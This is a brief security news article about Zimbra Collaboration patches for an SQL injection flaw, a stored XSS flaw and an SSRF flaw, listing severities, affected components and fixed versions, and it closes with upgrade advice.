Zimbra, a leading provider of collaboration software, recently announced crucial security updates to address several critical vulnerabilities in its platform. These flaws pose serious risks to users and organizations that rely on Zimbra’s services, as they could lead to significant information disclosure.
SQL Injection Vulnerability
One of the most critical vulnerabilities, CVE-2025-25064, carries a CVSS score of 9.8 out of 10. This SQL injection flaw affects the ZimbraSync Service SOAP endpoint in versions prior to 10.0.12 and 10.1.4. The vulnerability stems from inadequate sanitization of user-supplied parameters. Authenticated attackers can exploit this weakness to inject arbitrary SQL queries, allowing them to retrieve sensitive email metadata by manipulating specific request parameters. This access could lead to severe data breaches, making it essential for users to update their systems promptly.
Stored XSS Vulnerability
Zimbra also addressed a critical stored cross-site scripting (XSS) vulnerability in the Zimbra Classic Web Client. Although this issue has not yet received a CVE identifier, Zimbra emphasized that the fix enhances input sanitization and overall security. Users should upgrade to versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 to benefit from these important security enhancements.
SSRF Vulnerability
Additionally, Zimbra patched another vulnerability, CVE-2025-25065, which has a CVSS score of 5.3, indicating medium severity. This server-side request forgery (SSRF) flaw exists in the RSS feed parser component and could allow unauthorized redirection to internal network endpoints. Attackers could exploit this vulnerability to access sensitive internal resources, highlighting the need for immediate updates. The patch for this issue is available in versions 9.0.0 Patch 43, 10.0.12, and 10.1.4.
Recommendations for Users
Zimbra strongly advises all customers to upgrade to the latest versions of Zimbra Collaboration to ensure optimal protection against these vulnerabilities. By staying current with software updates, organizations can significantly reduce their risk of exploitation and safeguard sensitive data.
